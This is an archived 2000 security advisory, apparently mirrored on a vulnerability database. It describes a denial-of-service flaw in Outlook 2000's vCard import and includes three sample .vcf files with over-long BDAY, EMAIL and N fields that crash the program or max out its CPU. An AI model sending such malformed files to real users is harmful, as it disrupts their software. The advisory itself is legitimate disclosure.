Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:678
HistorySep 14, 2000 - 12:00 a.m.

vCard DoS on Outlook 2000

2000-09-1400:00:00
vulners.com
72
JSON

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Vulnerability in vCard import in Outlook 2000
Released: August 30, 2000

Summary

Under certain conditions, excessively long or malformed fields in a
vCard (.vcf) file can cause Microsoft Outlook 2000 to either
overflow or excessively utilize system resources.

Background

The specifications regarding vCard MIME types and field contents can
be found in RFCs 2425 and 2426.

Although RFC 2426 section 2.6 specifically requires lines longer than
75 characters to be folded as defined in [MIME-DIR], it appears
Outlook does not support line folding, and will attempt to import
any field in the file as one value, even if it is several pages long
or (in one case) overflows a data field within Outlook.

The effect this unlimited import attempt has on Outlook 2000 varies
between field types. Some fields will cause Outlook to consume
nearly all CPU time, and certain others (especially date/revision
fields and e-mail fields) will cause Outlook to terminiate
immediately due to an overflow.

Severity

Outlook 2000 does not attempt to open and import a .vcf file that a
user receives via e-mail without prompting the user first. However,
vCard files are extremely common, and many users have trained
themselves to ignore the warning dialog box.

Outlook does, however, open a vCard file with no questions asked if
the user saves it to a directory and double-clicks it from Windows
Explorer. In this situation, the vCard is processed directly with no
warning or status messages displayed to the user.

Affected Configurations

Microsoft Outlook 2000 was the only platform tested (on Windows NT
4.0 Workstation,
Service Pack 6a+hotfixes).

Affected fields in vCard file causing an overflow:

    • email:
    • bday; value=date (as low as 52 characters of form YYYY-MM-D(60)

Affected fields in vCard file causing excessive CPU utilization:

    • name:
    • nickname:
    • fn:
    • title:
    • title;language=de;value=text:
    • tel:
    • tel;<label>:
    • tel;<label>,<label>:

Fields which do not appear to be affected:

    • note:

Fields which do not appear to be supported:

    • any fields which continue on the next line or have defined newlines
      per RFC-2425
    • key:
    • o:

No other fields were tested.

Examples

The following examples will cause the advertised behavior.

1) A modification of the "bday" field to extend beyond 55 characters.
This example appears to be the smallest amount of text required to
elicit the symptom. This example will cause Outlook 2000 to overflow
and terminate.

BEGIN:VCARD
VERSION:2.1
N:Berger;Meister
FN:Meister Berger
NICKNAME:Sadf
ORG:Test;e3425454
TITLE:Burgermeister
NOTE:The Mayor of the great city of Goerlitz in the great country of
Germany.
TEL;WORK;VOICE:(873) 323-3213
TEL;HOME;VOICE:(873) 323-3213
TEL;CELL;VOICE:(873) 323-3213
TEL;VOICE:+49 3581 1234
TEL;WORK;FAX:(873) 323-3213
ADR;WORK:;dsfaf;3423 efdsdfsd;4534534tertgerwtgr;TN;34564;United
States of America
LABEL;WORK;ENCODING=QUOTED-PRINTABLE:dsfaf=0D=0A3423
efdsdfsd=0D=0A4534534tertgerwtgr, TN 34564=0D=0AUnited State=
s of America
URL:
URL:http://bin.false/
ROLE:sadf
BDAY:19630915130848273492749723947923749273942394792734972394729374927
4982739472937492873
EMAIL;PREF;INTERNET:[email protected]
REV:20000830T191121Z
END:VCARD

2) A modification of the "e-mail" field with a large amount of text
data masquerading as an e-mail address. This example will cause
Outlook 2000 to overflow and terminate.

BEGIN:VCARD
VERSION:2.1
N:Berger;Meister
FN:Meister Berger
NICKNAME:Sadf
ORG:Test;e3425454
TITLE:Burgermeister
NOTE:The Mayor of the great city of Goerlitz in the great country of
Germany.
TEL;WORK;VOICE:(873) 323-3213
TEL;HOME;VOICE:(873) 323-3213
TEL;CELL;VOICE:(873) 323-3213
TEL;VOICE:+49 3581 1234
TEL;WORK;FAX:(873) 323-3213
ADR;WORK:;dsfaf;3423 efdsdfsd;4534534tertgerwtgr;TN;34564;United
States of America
LABEL;WORK;ENCODING=QUOTED-PRINTABLE:dsfaf=0D=0A3423
efdsdfsd=0D=0A4534534tertgerwtgr, TN 34564=0D=0AUnited State=
s of America
URL:
URL:http://bin.false/
ROLE:sadf
BDAY:19630915
EMAIL;PREF;INTERNET:[email protected]
.possible.sadsack.not hing.doing.is.an.overflow.possible.

<content clipped for brevity - envision lots of text here>

.sadsack.nothing.doing.is.an.overflow.possible.com
REV:20000830T191121Z
END:VCARD

3) A modification of the "N" or "name" field with a large amount of
text will not cause Outlook to terminate, but will increase
Outlook's CPU utilization to 99%.

BEGIN:VCARD
VERSION:2.1
N:Berger MeisterBerger MeisterBerger MeisterBerger MeisterBerger
MeisterBerger Meister

<content clipped for brevity - envision lots of text here>

Berger MeisterBerger MeisterBerger MeisterBerger MeisterBerger
MeisterBerger MeisterBerger MeisterBerger Meister
FN:Meister Berger
NICKNAME:Sadf
ORG:Test;e3425454
TITLE:Burgermeister
NOTE:The Mayor of the great city of Goerlitz in the great country of
Germany.
TEL;WORK;VOICE:(873) 323-3213
TEL;HOME;VOICE:(873) 323-3213
TEL;CELL;VOICE:(873) 323-3213
TEL;VOICE:+49 3581 1234
TEL;WORK;FAX:(873) 323-3213
ADR;WORK:;dsfaf;3423 efdsdfsd;4534534tertgerwtgr;TN;34564;United
States of America
LABEL;WORK;ENCODING=QUOTED-PRINTABLE:dsfaf=0D=0A3423
efdsdfsd=0D=0A4534534tertgerwtgr, TN 34564=0D=0AUnited State=
s of America
URL:
URL:http://bin.false/
ROLE:sadf
BDAY:19630915
EMAIL;PREF;INTERNET:[email protected]
REV:20000830T191121Z
END:VCARD

Resolution

None at present, other than to disassociate the .vcf extension from
Outlook. There may be more fields affected – these are merely the
initially tested ones.

-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.5.1

iQA/AwUBOa1u3MZCl66UabcJEQJADgCfUY+6ZlnpsRevurebbD/M1XrlMfIAn1TO
LSZIBp6xoMPl4Tc5unZeICka
=N+p4
-----END PGP SIGNATURE-----

JSON